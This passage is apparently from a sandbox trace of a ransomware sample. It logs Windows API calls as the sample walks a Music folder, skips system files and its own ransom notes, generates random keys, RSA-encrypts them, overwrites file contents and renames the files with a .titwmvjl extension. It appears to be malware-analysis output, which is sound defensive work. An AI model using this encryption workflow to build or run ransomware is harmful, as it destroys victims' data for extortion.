returned 48 [0092.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0092.711] lstrlenW (lpString=".ini") returned 4 [0092.711] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.711] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0092.711] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0092.711] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0092.711] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\desktop.ini") returned 39 [0092.711] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0092.712] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.712] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.712] lstrcmpW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2=".") returned 1 [0092.712] lstrcmpW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="..") returned 1 [0092.712] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="HMjA43nguHpnFAxjSxa.m4a" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a" [0092.712] lstrlenW (lpString=".titwmvjl") returned 9 [0092.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned 51 [0092.712] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.712] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a.titwmvjl") returned 60 [0092.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned 51 [0092.712] lstrlenW (lpString=".m4a") returned 4 [0092.712] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.712] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".m4a ") returned 5 [0092.712] lstrcmpiW (lpString1=".m4a", lpString2=".titwmvjl") returned -1 [0092.712] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned 51 [0092.712] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned 51 [0092.712] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="desktop.ini") returned 1 [0092.712] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="autorun.inf") returned 1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="ntuser.dat") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="iconcache.db") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="bootsect.bak") returned 1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="boot.ini") returned 1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="ntuser.dat.log") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="thumbs.db") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="KRAB-DECRYPT.html") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="CRAB-DECRYPT.html") returned 1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="KRAB-DECRYPT.txt") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="ntldr") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="NTDETECT.COM") returned -1 [0092.713] lstrcmpiW (lpString1="HMjA43nguHpnFAxjSxa.m4a", lpString2="Bootfont.bin") returned 1 [0092.713] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a") returned 51 [0092.713] lstrlenW (lpString=".m4a") returned 4 [0092.713] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.713] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".m4a ") returned 5 [0092.713] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.713] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.713] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\hmja43nguhpnfaxjsxa.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.714] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.714] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.714] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.715] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.715] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.715] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.716] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.716] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.716] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.716] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.716] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.716] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.716] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.717] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.717] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.717] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.717] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.717] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.717] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.717] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.718] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.718] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503378) returned 1 [0092.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.718] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.718] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.719] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.719] GetLastError () returned 0x0 [0092.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.719] CryptDestroyKey (hKey=0x503378) returned 1 [0092.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.719] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.719] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.719] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.720] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.720] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5038f8) returned 1 [0092.720] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.720] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.720] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.720] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.721] GetLastError () returned 0x0 [0092.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.721] CryptDestroyKey (hKey=0x5038f8) returned 1 [0092.721] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.721] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.721] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.721] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.721] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x75b7, lpOverlapped=0x0) returned 1 [0092.728] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffff8a49, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.729] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x75b7, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x75b7, lpOverlapped=0x0) returned 1 [0092.731] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.731] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.732] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.736] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.736] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.736] CloseHandle (hObject=0x2ac) returned 1 [0092.738] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\hmja43nguhpnfaxjsxa.m4a"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\HMjA43nguHpnFAxjSxa.m4a.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\hmja43nguhpnfaxjsxa.m4a.titwmvjl"), dwFlags=0x1) returned 1 [0092.739] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.739] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.739] lstrcmpW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2=".") returned 1 [0092.740] lstrcmpW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="..") returned 1 [0092.740] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="lvEA9qdqTLwYH-_S9b.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3" [0092.740] lstrlenW (lpString=".titwmvjl") returned 9 [0092.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned 50 [0092.740] VirtualAlloc (lpAddress=0x0, dwSize=0xa4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0092.740] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3.titwmvjl") returned 59 [0092.740] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned 50 [0092.740] lstrlenW (lpString=".mp3") returned 4 [0092.740] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.740] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".mp3 ") returned 5 [0092.740] lstrcmpiW (lpString1=".mp3", lpString2=".titwmvjl") returned -1 [0092.740] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned 50 [0092.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned 50 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="desktop.ini") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="autorun.inf") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="ntuser.dat") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="iconcache.db") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="bootsect.bak") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="boot.ini") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="ntuser.dat.log") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="thumbs.db") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="KRAB-DECRYPT.html") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="CRAB-DECRYPT.html") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="KRAB-DECRYPT.txt") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="CRAB-DECRYPT.txt") returned 1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="ntldr") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="NTDETECT.COM") returned -1 [0092.741] lstrcmpiW (lpString1="lvEA9qdqTLwYH-_S9b.mp3", lpString2="Bootfont.bin") returned 1 [0092.741] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3") returned 50 [0092.741] lstrlenW (lpString=".mp3") returned 4 [0092.741] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.741] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".mp3 ") returned 5 [0092.741] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.742] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0092.742] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\lvea9qdqtlwyh-_s9b.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0092.742] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.742] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0092.743] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.743] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.744] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.744] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.744] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.744] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.744] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0092.744] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.744] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.744] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.745] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.745] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0092.745] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0092.745] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0092.745] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0092.745] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0092.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.746] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.746] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.746] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.747] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503578) returned 1 [0092.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.747] CryptGetKeyParam (in: hKey=0x503578, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.747] CryptEncrypt (in: hKey=0x503578, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.747] GetLastError () returned 0x0 [0092.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.747] CryptDestroyKey (hKey=0x503578) returned 1 [0092.747] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.748] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.748] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0092.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.748] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5036f8) returned 1 [0092.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.748] CryptGetKeyParam (in: hKey=0x5036f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0092.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.749] CryptEncrypt (in: hKey=0x5036f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0092.749] GetLastError () returned 0x0 [0092.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.749] CryptDestroyKey (hKey=0x5036f8) returned 1 [0092.749] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0092.749] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0092.749] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0092.749] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0092.750] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x1caf, lpOverlapped=0x0) returned 1 [0092.761] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xffffe351, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.761] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x1caf, lpOverlapped=0x0) returned 1 [0092.762] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.762] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0092.764] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.767] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.767] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.768] CloseHandle (hObject=0x2ac) returned 1 [0092.768] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\lvea9qdqtlwyh-_s9b.mp3"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\lvEA9qdqTLwYH-_S9b.mp3.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\lvea9qdqtlwyh-_s9b.mp3.titwmvjl"), dwFlags=0x1) returned 1 [0092.769] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0092.769] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0092.769] lstrcmpW (lpString1="sSxPZkKuqdeph", lpString2=".") returned 1 [0092.769] lstrcmpW (lpString1="sSxPZkKuqdeph", lpString2="..") returned 1 [0092.769] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\", lpString2="sSxPZkKuqdeph" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph" [0092.769] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\sSxPZkKuqdeph\\" [0092.769] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0092.769] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.770] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0092.770] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0092.770] SHGetSpecialFolderPathW 